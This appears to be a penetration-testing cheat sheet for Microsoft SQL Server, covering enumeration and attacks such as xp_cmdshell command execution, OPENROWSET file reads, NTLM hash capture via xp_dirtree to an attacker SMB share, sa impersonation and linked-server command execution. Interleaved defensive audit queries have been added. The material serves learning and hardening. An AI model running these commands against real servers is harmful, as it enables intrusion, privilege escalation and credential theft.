MSSQL


Last updated 25 days ago

ABOUT

Microsoft SQL Server (MSSQL) is Microsoft's SQL-based relational database management system. It is popular among database administrators and developers building applications on Microsoft's .NET framework because of its strong native .NET support. MSSQL exposes a lot of different attack surface. The default ports are 1433 and 1434. More about MSSQL hacking can be read here

Authentication Mods

MSSQL has two authentication modes: Windows authentication mode (the default) and mixed mode. Windows authentication mode is often called "integrated" because of its tight integration with AD and Windows: if you are the right user, or a member of the right group, you are authenticated to the database automatically. Mixed mode supports both AD/Windows authentication and SQL Server logins. If we specify a domain, Windows authentication is used; if we do not specify a domain, SQL authentication is used. The domain is specified with the servername\\accountname form.
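The following T-SQL is an added example, not part of the original page: it reports which authentication mode the instance runs in and lists the logins that exist under each, so a reviewer can see whether mixed mode is actually needed. It assumes a login with VIEW ANY DEFINITION (or sysadmin) and uses only documented catalog views and built-in functions; PWDCOMPARE is Microsoft's documented way to test a stored hash against a candidate, used here with the empty string to flag blank-password SQL logins (the same weakness the ms-sql-empty-password nmap script probes).

```sql
-- Added audit example (not from the page). Run as sysadmin or a login holding
-- VIEW ANY DEFINITION, in any database.

-- 1. Authentication mode: 1 = Windows authentication only, 0 = mixed mode.
SELECT CASE CAST(SERVERPROPERTY('IsIntegratedSecurityOnly') AS int)
            WHEN 1 THEN 'Windows authentication only'
            WHEN 0 THEN 'Mixed mode (Windows + SQL Server logins)'
       END AS authentication_mode;

-- 2. Logins by type. SQL logins (type S) only work in mixed mode, so any
--    enabled S login on a "Windows only" box is dead weight worth removing.
SELECT sp.name,
       sp.type_desc,                      -- SQL_LOGIN, WINDOWS_LOGIN, WINDOWS_GROUP
       sp.is_disabled,
       sl.is_policy_checked,              -- NULL for Windows principals
       sl.is_expiration_checked,
       CASE WHEN PWDCOMPARE('', sl.password_hash) = 1
            THEN 'BLANK PASSWORD' ELSE '' END AS finding
FROM sys.server_principals sp
LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id
WHERE sp.type IN ('S', 'U', 'G')          -- S = SQL login, U = Windows login, G = Windows group
  AND sp.name NOT LIKE '##%'              -- skip internal certificate-based logins
ORDER BY sp.type_desc, sp.name;
```

Rows with a non-empty finding column, or SQL logins with is_policy_checked = 0, are the ones to fix first (ALTER LOGIN ... WITH CHECK_POLICY = ON, or disable the login) before worrying about the rest of the surface on this page.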

Databases

MSSQL has default system databases that can help us understand the structure of all the databases that may be hosted on a target server.

Database   Description
master     Tracks all system information for an SQL Server instance
model      Template database that acts as a structure for every new database created. Any setting changed in the model database is reflected in any database created afterwards
msdb       The SQL Server Agent uses this database to schedule jobs & alerts
tempdb     Stores temporary objects
resource   Read-only database containing the system objects shipped with SQL Server

MSSQL Useful Commands

HackTricks:

Command / Description

impacket-mssqlclient carni17@13.13.13.13
    Connect to the MSSQL server

SELECT name FROM master.dbo.sysdatabases;
    Show all databases

use <database>;
    Select one of the existing databases

SELECT * FROM databasename.INFORMATION_SCHEMA.TABLES;
    Show all available tables in the selected database

select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
    List users

select * from <table>;
    Show everything in the desired table

xp_cmdshell 'whoami'
    NOT DEFAULT. System command execution via MSSQL

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
    NOT DEFAULT. Reading local files
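Both "NOT DEFAULT" rows above depend on server configuration and permissions that a defender can read back from the catalog. The block below is an added example, not part of the original page: it shows the current state of the relevant sp_configure options, who holds EXECUTE on xp_cmdshell and the bulk permission OPENROWSET(BULK) needs, whether an xp_cmdshell proxy account exists, and the commands that turn the feature off. It assumes sysadmin rights; the option names and catalog views are Microsoft's.

```sql
-- Added audit example (not from the page). Requires sysadmin.

-- 1. Dangerous instance-level options. value_in_use = 1 means enabled.
SELECT name, CAST(value_in_use AS int) AS enabled
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ad Hoc Distributed Queries',   -- OPENROWSET/OPENDATASOURCE against remote sources
               'Ole Automation Procedures',    -- sp_OACreate and friends
               'clr enabled');

-- 2. Who can call xp_cmdshell besides sysadmin? Permissions on the procedure
--    live in master.
SELECT dp.name AS grantee, dp.type_desc, p.permission_name, p.state_desc
FROM master.sys.database_permissions AS p
JOIN master.sys.database_principals AS dp ON p.grantee_principal_id = dp.principal_id
WHERE p.major_id = OBJECT_ID('master.dbo.xp_cmdshell');

-- 3. Non-sysadmin callers of xp_cmdshell run under this proxy credential if it exists.
SELECT name, credential_identity, create_date
FROM sys.credentials
WHERE name = '##xp_cmdshell_proxy_account##';

-- 4. OPENROWSET(BULK ...) needs this server permission (sysadmin has it implicitly).
SELECT sp.name AS grantee, sp.type_desc, p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS sp ON p.grantee_principal_id = sp.principal_id
WHERE p.permission_name = 'ADMINISTER BULK OPERATIONS';

-- 5. Hardening: switch the shell off again. 'show advanced options' must be on
--    to touch xp_cmdshell; turn it back off afterwards.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;          RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

Query 1 is also a useful detection baseline: a scheduled job that snapshots sys.configurations and alerts when xp_cmdshell flips from 0 to 1 catches the enable step that precedes command execution.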

CMD Interacting

Linux

sqsh -S 13.13.13.13 -U venator17 -P 'superkek' -h
# We need to send GO to execute a batch; put each clause of the statement (each part starting with a verb) on its own line
sqsh -S 13.13.13.13 -U MILITECH\\venator17 -P 'superkek' -h
# or we could use "." instead of the domain if we don't know its name
impacket-mssqlclient MILITECH/ADMINISTRATOR@13.13.13.13 -windows-auth

Windows

sqlcmd -S 13.13.13.13 -U venator17 -P superkek123
sqlcmd # If you are already on the system
# We need to send GO to execute a batch; put each clause of the statement (each part starting with a verb) on its own line

ENUM

Nmap Scan

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 13.13.13.13

Metasploit Scan

We can use mssql_ping to get more useful information about the MSSQL server.

msf6 auxiliary(scanner/mssql/mssql_ping) > set rhosts 13.13.13.13

rhosts => 13.13.13.13

msf6 auxiliary(scanner/mssql/mssql_ping) > run

[*] 13.13.13.13:       - SQL Server information for 13.13.13.13:
[+] 13.13.13.13:       -    ServerName      = SQL-01
[+] 13.13.13.13:       -    InstanceName    = MSSQLSERVER
[+] 13.13.13.13:       -    IsClustered     = No
[+] 13.13.13.13:       -    Version         = 15.0.2000.5
[+] 13.13.13.13:       -    tcp             = 1433
[+] 13.13.13.13:       -    np              = \\SQL-01\pipe\sql\query
[*] 13.13.13.13:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

PowerUpSQL

PS C:\> Import-Module .\PowerUpSQL.ps1
PS C:\> Get-SQLInstanceDomain

Login

PS C:\> Get-SQLQuery -Verbose -Instance "13.13.13.13,1433" -username "militech\sreed" -password "password123" -query 'Select @@version'

ATTACKS

Capture MSSQL Service Hash

EXEC master..xp_dirtree '\\13.13.13.13\amogus\'
OR
EXEC master..xp_subdirs '\\13.13.13.13\amogus\'
# Then use Responder or impacket-smbserver to stand up a fake SMB server and capture the service account's NTLM hash

Impersonating other users

  1. Check which users can be impersonated

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
GO

  2. Check the current role and user

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO

  3. Impersonate the sa user

EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
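The three steps above are the attacker's view. As an added example, not part of the original page, here is the matching audit query for the administrator: it pairs every IMPERSONATE grant with the login that holds it and the login it targets, flags targets that are sysadmin, and shows the revoke. It joins on major_id (the ID of the login securable) rather than grantor_principal_id, so it lists the grant regardless of who issued it; the login name in the REVOKE is a placeholder.

```sql
-- Added audit example (not from the page). Run as sysadmin.

-- Every login-level IMPERSONATE grant: who holds it, whom it targets, and whether
-- the target is sysadmin (a grant on such a target is a direct path to full control).
SELECT grantee.name AS grantee_login,
       grantee.type_desc AS grantee_type,
       target.name AS impersonable_login,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin,
       p.state_desc                               -- GRANT vs GRANT_WITH_GRANT_OPTION vs DENY
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals AS target  ON p.major_id = target.principal_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'          -- permission on a login, not on the server
  AND p.permission_name = 'IMPERSONATE'
ORDER BY target_is_sysadmin DESC, grantee_login;

-- Logins that already hold sysadmin outright; IMPERSONATE on any of these is equivalent.
SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;

-- Remediation for an unwanted grant (replace <weak_login> with the grantee from the
-- first query; 'sa' is the target shown in the steps above).
REVOKE IMPERSONATE ON LOGIN::[sa] FROM [<weak_login>];
```

Legitimate IMPERSONATE grants normally target a low-privilege login used for testing permissions, never sa or another sysadmin; anything with target_is_sysadmin = 1 should have a documented owner or be revoked.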

Check linked server

  1. Identify linked servers

SELECT srvname, isremote FROM sysservers
GO

This returns a server list: entries with "1" are remote servers, entries with "0" are linked servers.

  2. Check rights

EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [13.13.13.13\LINKEDSERVER]
GO

  3. Execute commands at the linked server

EXECUTE('') AT [13.13.13.13\LINKEDSERVER]
GO

If you have quotes in the command, use doubled single quotes for them (''example'')
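EXECUTE ... AT only works when the linked server has "rpc out" enabled and a login mapping that grants the caller something on the remote side, so those two settings are what to audit. The block below is an added example, not part of the original page: it lists every linked server with its RPC settings and login mappings, calls out fixed remote credentials (the case where any local login inherits a stored remote identity), and shows the two hardening commands. The server name is a placeholder; the catalog views and procedures are Microsoft's.

```sql
-- Added audit example (not from the page). Run as sysadmin.

-- Linked servers and their login mappings. local_principal_id = 0 is the default
-- mapping that applies to every local login that has no explicit entry.
SELECT s.name AS linked_server,
       s.product, s.provider, s.data_source,
       s.is_rpc_out_enabled,                        -- required for EXECUTE ... AT
       s.is_remote_login_enabled,
       COALESCE(lp.name, '<all logins>') AS local_login,
       ll.uses_self_credential,                     -- 1 = pass the caller's own credentials
       ll.remote_name,                              -- fixed remote login when uses_self_credential = 0
       CASE WHEN ll.uses_self_credential = 0 AND ll.remote_name IS NOT NULL
                 AND ll.local_principal_id = 0
            THEN 'FIXED CREDENTIAL FOR ALL LOGINS' ELSE '' END AS finding
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON s.server_id = ll.server_id
LEFT JOIN sys.server_principals AS lp ON ll.local_principal_id = lp.principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Hardening (replace <LINKEDSERVER> with a name from the query above):
-- 1. Stop arbitrary batches being pushed through the link.
EXEC sp_serveroption @server = N'<LINKEDSERVER>', @optname = 'rpc out', @optvalue = 'false';
-- 2. Drop the catch-all mapping so only explicitly mapped logins can use the link.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'<LINKEDSERVER>', @locallogin = NULL;
```

The finding column is the configuration the page's step 2 abuses: when every local login is mapped to one stored remote account, the remote privilege check returns that account's rights, not the caller's.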

PowerUpSQL is a PowerShell toolkit for SQL Server that covers enumeration, auditing and attack primitives.
